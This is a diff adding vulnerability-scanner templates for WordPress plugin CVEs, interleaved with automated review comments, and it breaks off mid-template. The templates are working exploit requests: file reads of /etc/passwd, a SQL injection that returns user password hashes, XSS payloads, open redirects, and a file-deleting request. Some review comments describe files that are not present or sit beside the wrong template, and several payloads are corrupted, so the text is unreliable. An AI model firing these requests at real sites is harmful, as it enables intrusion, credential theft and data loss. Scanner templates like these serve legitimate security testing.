200 diff --git a/poc/cve/CVE-2015-9480-2629.yaml b/poc/cve/CVE-2015-9480-2629.yaml new file mode 100644 index 0000000000..ac300031f7 --- /dev/null +++ b/poc/cve/CVE-2015-9480-2629.yaml 
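Review bot: The traversal payload `../../../../wp-config.php` assumes download.php sits exactly four directories below the web root, which is true for the default `wp-content/plugins/wp-source-control/downloadfiles/` layout but not for sites that relocate `wp-content`; a comment such as `# four levels: downloadfiles -> plugin -> plugins -> wp-content -> webroot` would save re-deriving it. A successful match also copies `DB_PASSWORD` into scan output, so results from this template are credential material and should be handled as such. The `classification` block carries only `cve-id` although the NVD page referenced has CVSS metrics that the sibling templates include.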
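Review bot: The tags line uses `2014` where every other template in this batch uses `cve2014` (`tags: cve,2014,wordpress,xss,wp-plugin`), so a `-tags cve2014` run will not select it; change it to `cve2014`. The body word is empty (`- ""`), which any response satisfies; the literal reflected `"><script>alert(1)</script>` should be matched. There is no `description` or `classification` block, unlike the sibling templates.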
@@ -0,0 +1,33 @@ +id: CVE-2015-9480 + +info: + name: WordPress RobotCPA 5 - Directory Traversal + author: daffainfo + severity: high + description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. + reference: + - https://www.exploit-db.com/exploits/37252 + - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-9480 + cwe-id: CWE-22 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/poc/cve/CVE-2016-1000130-2660.yaml b/poc/cve/CVE-2016-1000130-2660.yaml new file mode 100644 index 0000000000..811e6a7a96 --- /dev/null +++ b/poc/cve/CVE-2016-1000130-2660.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000130 +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 + - https://wordpress.org/plugins/e-search + - http://www.vapidlabs.com/wp/wp_advisory.php?v=394 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000130 + cwe-id: CWE-79 + metadata: + google-query: inurl:"/wp-content/plugins/e-search" + tags: cve,cve2016,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 
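Review bot: The `l` value `ZmlsZTovLy9ldGMvcGFzc3dk` is opaque base64; it appears to decode to `file:///etc/passwd`, which would mean the PoC exercises a `file://` stream wrapper rather than a `../` traversal as the `name` and `cwe-id: CWE-22` suggest — worth confirming against the exploit-db entry and stating in a comment, `# l = base64("file:///etc/passwd")`. The regex `root:.*:0:0:` is fine for /etc/passwd but will not fire on Windows targets; acceptable for this PoC, just say so.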
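Review bot: The body word matcher is empty (`- ""`), so any 200 text/html response from date_select.php satisfies the `and` condition and the template does not show that `date-from` is reflected unescaped. The word should be the exact reflected payload, `</script><script>alert(document.domain)</script>` (check the committed file was not stripped on rendering). The `description` is a single sentence; naming the file and parameter (`tmpl/date_select.php`, `date-from`) there, as the other templates do, would make it self-describing.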
diff --git a/poc/cve/CVE-2016-1000136-2686.yaml b/poc/cve/CVE-2016-1000136-2686.yaml new file mode 100644 index 0000000000..f6b6733834 --- /dev/null +++ b/poc/cve/CVE-2016-1000136-2686.yaml @@ -0,0 +1,38 @@ +id: CVE-2016-1000136 + +info: + name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin heat-trackr v1.0 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 + - https://wordpress.org/plugins/heat-trackr + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000136 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2017-1000170-2838.yaml b/poc/cve/CVE-2017-1000170-2838.yaml new file mode 100644 index 0000000000..234f130531 --- /dev/null +++ b/poc/cve/CVE-2017-1000170-2838.yaml 
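Review bot: The body word matcher is `''`, an empty word, so the only thing this template establishes is that heat-trackr_abtest_add.php answers 200 with text/html, not that `id` is reflected. Match the literal reflected `</script><script>alert(document.domain)</script>` instead, and verify the committed file was not stripped during rendering. The `description` ("Reflected XSS in wordpress plugin heat-trackr v1.0") omits the file and parameter named in the title; repeat them there.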
@@ -0,0 +1,35 @@ +id: CVE-2017-1000170 +info: + name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion + author: dwisiswant0 + severity: high + description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree. + reference: + - https://www.exploit-db.com/exploits/49693 + - https://github.com/jqueryfiletree/jqueryfiletree/issues/66 + - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-1000170 + cwe-id: CWE-22 + tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and + matchers: + - type: word + words: + - "
  • " + - "passwd
  • " + condition: and + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/09 diff --git a/poc/cve/CVE-2019-10692(1).yaml b/poc/cve/CVE-2019-10692(1).yaml new file mode 100644 index 0000000000..a15f0cd07d --- /dev/null +++ b/poc/cve/CVE-2019-10692(1).yaml 
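Review bot: The two body words appear here as a bullet glyph and `passwd` across broken lines, which is what an HTML list-item fragment looks like once rendered; a word matcher compares literal bytes, so the committed lines must carry the raw HTML the connector emits around `passwd` — verify the repository file byte-for-byte. Separately, the PoC lists `/etc/` via `dir=%2Fetc%2F&onlyFiles=true`, i.e. a directory listing through path traversal (the `cwe-id` is CWE-22 and the packetstorm reference itself says "Path Traversal"), not a local file inclusion as the `name` and the `lfi` tag claim; retitle it `... - Path Traversal / Directory Listing` so triage does not expect code execution.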
@@ -0,0 +1,57 @@ +id: CVE-2019-10692 + +info: + name: WordPress Google Maps <7.11.18 - SQL Injection + author: pussycat0x + severity: critical + description: | + WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. + remediation: | + Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher). + reference: + - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea + - https://wordpress.org/plugins/wp-google-maps/#developers + - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755 + - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-10692 + cwe-id: CWE-89 + epss-score: 0.9737 + epss-percentile: 0.99889 + cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: codecabin + product: wp_go_maps + framework: wordpress + tags: cve2019,cve,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin + +http: + - method: GET + path: + - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"user_login"' + - '"user_pass"' + - '"user_nicename"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 +# digest: 
4a0a00473045022100c806b890a97e99051ab9b8870e02ada13436f59da4752594ce9b67a1128d22d40220703e18d56fabf954d54d723644533979ffb22a19e26d64263430140e7f069c9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-15713-3886.yaml b/poc/cve/CVE-2019-15713-3886.yaml new file mode 100644 index 0000000000..72094546ac --- /dev/null +++ b/poc/cve/CVE-2019-15713-3886.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-15713 +info: + name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo,dhiyaneshDk + severity: medium + description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15713 + cwe-id: CWE-79 +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2020-24312-4805.yaml b/poc/cve/CVE-2020-24312-4805.yaml new file mode 100644 index 0000000000..8857313069 --- /dev/null +++ b/poc/cve/CVE-2020-24312-4805.yaml 
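Review bot: The injected `fields=* from wp_users-- -` hard-codes the default `wp_` table prefix, so a site with a custom prefix returns a SQL error instead of rows and the template reports nothing although it is just as vulnerable; document that, `# assumes the default wp_ table prefix; custom prefixes produce a false negative`. A positive match also writes `user_pass` hashes into scan output, so the `impact` text should say that credential hashes are disclosed, not just "unauthorized access". The file carries a `# digest:` signature line, so any edit must be re-signed or the digest stops verifying.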
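Review bot: The request goes to the site root (`/?rsd=...`) and the body word is empty (`- ""`), so nothing ties the reflection to My Calendar and the template flags any WordPress front page that returns 200 text/html. Match the literal reflected `</script><script>alert(document.domain)</script>` and add a plugin fingerprint word such as `my-calendar` so a match implies the plugin is installed.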
@@ -0,0 +1,24 @@ +id: cve-2020-24312 + +info: + name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure + author: x1m_martijn + severity: high + + # NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-24312 + # Source: https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ + # Note: Manually check content + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Index of' \ No newline at end of file diff --git a/poc/cve/CVE-2020-24312-4806.yaml b/poc/cve/CVE-2020-24312-4806.yaml new file mode 100644 index 0000000000..0c6a124ffa --- /dev/null +++ b/poc/cve/CVE-2020-24312-4806.yaml @@ -0,0 +1,37 @@ +id: CVE-2020-24312 + +info: + name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure + author: x1m_martijn + severity: high + description: | + mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. + reference: + - https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-24312 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-24312 + cwe-id: CWE-552 + tags: cve,cve2020,wordpress,backups,plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Index of' + - 'wp-content/uploads/wp-file-manager-pro/fm_backup' + - 'backup_' + condition: and + +# Enhanced by mp on 2022/04/08 
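Review bot: This file duplicates CVE-2020-24312-4806 for the same CVE with a lower-case `id: cve-2020-24312`, no `description`, no `tags`, and a weaker matcher — `Index of` plus 200 matches any autoindex page — so it is a strict subset of its sibling and yields a second, noisier finding per host; drop it and keep the 4806 version. If it must stay, at least use `id: CVE-2020-24312` so the two share an id and nuclei can deduplicate them, and add the `# Note: Manually check content` caveat to the finding text rather than a comment.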
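Review bot: The `description` says the plugin fails to protect the `fm_backups` directory, but the request path and the word matcher both use `fm_backup` (singular); one of them is wrong, and if the directory really is `fm_backups` the template never fires. Confirm the name from the plugin source or the zeroaptitude write-up and align all three occurrences. The matcher word `backup_` also assumes a naming convention for the listed files; a comment such as `# backup archives are named backup_<timestamp>...` would justify it if that is what the write-up shows.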
diff --git a/poc/cve/CVE-2020-35951-5106.yaml b/poc/cve/CVE-2020-35951-5106.yaml new file mode 100644 index 0000000000..0ab49a2bc9 --- /dev/null +++ b/poc/cve/CVE-2020-35951-5106.yaml 
@@ -0,0 +1,67 @@ +id: CVE-2020-35951 + +info: + name: Wordpress Quiz and Survey Master Arbitrary File Deletion + author: princechaddha + severity: critical + description: | + An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). + reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ + tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-score: 9.90 + cve-id: CVE-2020-35951 + cwe-id: CWE-306 + +requests: + - raw: + - | + GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92 + + + ------WebKitFormBoundaryBJ17hSJBjuGrnW92 + Content-Disposition: form-data; name="action" + + qsm_remove_file_fd_question + ------WebKitFormBoundaryBJ17hSJBjuGrnW92 + Content-Disposition: form-data; name="file_url" + + {{fullpath}}wp-content/plugins/quiz-master-next/README.md + ------WebKitFormBoundaryBJ17hSJBjuGrnW92-- + + - | + GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: fullpath + internal: true + part: body + group: 1 + regex: + - "not found in ([/a-z_]+)wp" + + req-condition: true + matchers-condition: and + matchers: + + - type: word + words: + - '{"type":"success","message":"File 
removed successfully"}' + part: body + + - type: dsl + dsl: + - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')" \ No newline at end of file diff --git a/poc/cve/CVE-2021-24495-5749.yaml b/poc/cve/CVE-2021-24495-5749.yaml new file mode 100644 index 0000000000..7851a3c8fc --- /dev/null +++ b/poc/cve/CVE-2021-24495-5749.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-24495 + +info: + name: Wordpress Plugin Marmoset Viewer XSS + author: johnjhacking + severity: medium + description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue. + reference: + - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ + - https://wordpress.org/plugins/marmoset-viewer/#developers + - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24495 + cwe-id: CWE-79 + tags: cve,cve2021,wp-plugin,wordpress,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" + - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + - "alert(/{{randstr}}/)" + part: body + condition: or + + - type: word + words: + - "Marmoset Viewer" diff --git a/poc/cve/CVE-2021-24838-5768.yaml b/poc/cve/CVE-2021-24838-5768.yaml new file mode 100644 index 0000000000..330119c99b --- /dev/null +++ b/poc/cve/CVE-2021-24838-5768.yaml 
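Review bot: The third request in this template deletes a file on the target — `qsm_remove_file_fd_question` with `file_url` pointing at the site's own `README.md` — and the fourth request confirms the deletion (`status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')`), so a positive result means the scanner just removed a file from a production install. That needs to be stated up front, `# WARNING: destructive - deletes wp-content/plugins/quiz-master-next/README.md on the target`, plus an `intrusive` tag so it is excluded from default runs. The `fullpath` extractor relies on a PHP error message leaking the absolute path (`not found in ([/a-z_]+)wp`), which fails silently when `display_errors` is off or when the path contains digits, hyphens or uppercase letters; document that precondition and widen the character class.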
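Review bot: The payload matcher combines `""` and `alert(/{{randstr}}/)` with `condition: or`, and the empty first word is satisfied by every body, so the `or` is always true and the template reduces to `200 + "Marmoset Viewer" in body` — the reflected-script check contributes nothing. Either the first word should be the literal reflected `<script>` tag for the plain `id=http://` request (likely stripped on rendering; confirm the committed file) or it should be removed so `alert(/{{randstr}}/)` alone must match.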
@@ -0,0 +1,32 @@ +id: CVE-2021-24838 + +info: + name: AnyComment <= 0.2.21 - Open Redirect + author: noobexploiter + severity: medium + description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature. + reference: + - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24838 + tags: wordpress,wp-plugin,open-redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24838 + cwe-id: CWE-601 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + + - type: status + status: + - 302 diff --git a/poc/cve/CVE-2021-24947-5775.yaml b/poc/cve/CVE-2021-24947-5775.yaml new file mode 100644 index 0000000000..216a1e0d5a --- /dev/null +++ b/poc/cve/CVE-2021-24947-5775.yaml 
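Review bot: The `tags` line (`wordpress,wp-plugin,open-redirect`) omits `cve` and `cve2021`, so this template is excluded from `-tags cve` runs although it sits in poc/cve and has a `cve-id`; change it to `tags: cve,cve2021,wordpress,wp-plugin,redirect` (the sibling CVE-2021-25074 uses `redirect`, so pick one form). The hard `302` status matcher will miss a 301/303/307 redirect that is just as exploitable; `status: [301, 302, 303, 307, 308]` is safer.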
@@ -0,0 +1,41 @@ +id: CVE-2021-24947 + +info: + name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read + author: cckuailong + severity: high + description: "WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server." + reference: + - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24947 + classification: + cve-id: CVE-2021-24947 + cwe-id: CWE-23 + tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/13 diff --git a/poc/cve/CVE-2021-24991-5779.yaml b/poc/cve/CVE-2021-24991-5779.yaml new file mode 100644 index 0000000000..0776823a12 --- /dev/null +++ b/poc/cve/CVE-2021-24991-5779.yaml 
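Review bot: The second request sends `nonce=5`, a constant, which only works if the AJAX handler never verifies the nonce; the description says validation is missing, but that should be stated next to the request, `# nonce is not validated by the vulnerable handler; any value passes`, so nobody "fixes" it to a real nonce. The template needs `{{username}}` and `{{password}}` supplied via `-V`, yet nothing in the file says so; a comment on the login request would prevent silent failures. The `classification` block has no `cvss-metrics`/`cvss-score` although NVD is referenced.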
@@ -0,0 +1,51 @@ +id: CVE-2021-24991 + +info: + name: WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting + author: cckuailong + severity: medium + description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard. + reference: + - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2021-24991 + cwe-id: CWE-79 + cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:*:*:* + epss-score: 0.00092 + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan + metadata: + max-request: 2 + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" + - "WooCommerce PDF Invoices" + condition: and + + - type: status + status: + - 200 + +# Enhanced by cs 08/16/2022 diff --git a/poc/cve/CVE-2021-25074-5799.yaml b/poc/cve/CVE-2021-25074-5799.yaml new file mode 100644 index 0000000000..a813eb2c79 --- /dev/null +++ b/poc/cve/CVE-2021-25074-5799.yaml 
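Review bot: The query string of the second request reads `page=wpo_wcpdf_options_page§ion=...` — the `&section=` separator has become `§ion=`, which is what happens when `&sect` is interpreted as the HTML entity for `§`; as written no `section` parameter is sent and the XSS can never reflect. The committed template must contain the literal `&section=` (the matcher word suggests the rest of the payload is intact). Confirm the repository file was not mangled the same way.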
@@ -0,0 +1,28 @@ +id: CVE-2021-25074 + +info: + name: WebP Converter for Media < 4.0.3 - Unauthenticated Open redirect + author: 0x_Akoko + severity: medium + description: The plugin contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an Open Redirect issue + reference: + - https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164 + - https://www.cvedetails.com/cve/CVE-2021-25074 + tags: cve,cve2021,redirect,webp,wordpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-25074 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com' + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/poc/cve/CVE-2021-39322-6337.yaml b/poc/cve/CVE-2021-39322-6337.yaml new file mode 100644 index 0000000000..80b3ada7a5 --- /dev/null +++ b/poc/cve/CVE-2021-39322-6337.yaml 
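Review bot: The Location regex requires `example.com` to be followed only by optional whitespace and end of line, so a redirect to `https://example.com/` (trailing slash) or `example.com?...` does not match, while the sibling CVE-2021-24838 template tolerates a path with `\/?(\/|[^.].*)?$`; use the same form here. There is also no status matcher and no `matchers-condition`, so add `- type: status` with the 3xx codes and `matchers-condition: and` as the other redirect templates do.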
@@ -0,0 +1,52 @@ +id: CVE-2021-39322 + +info: + name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + reference: + - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 + - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39322 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/CVE-2021-39350-6343.yaml b/poc/cve/CVE-2021-39350-6343.yaml new file mode 100644 index 0000000000..330eb99f1e --- /dev/null +++ b/poc/cve/CVE-2021-39350-6343.yaml 
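Review bot: The exploit request is `/wp-admin/admin.php//?page=cnss_social_icon_page` and the body word is `''`, so the template sends no injected markup and then accepts any 200 text/html response — it cannot demonstrate the PHP_SELF reflection the description talks about. The payload belongs in the path segment after `admin.php/` (the description says it is injected into the request path), and the body word must be that same literal string; both look stripped in this rendering, so check the committed file. The `tags` list `authenticated` while the CVSS vector says `PR:N`; the login step is needed because the page lives under `/wp-admin/`, and a one-line comment saying so would remove the apparent contradiction.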
@@ -0,0 +1,54 @@ +id: CVE-2021-39350 + +info: + name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected Cross-Site Scripting + author: gy741 + severity: medium + description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. + reference: + - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39350 + - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39350 + cwe-id: CWE-79 + tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + 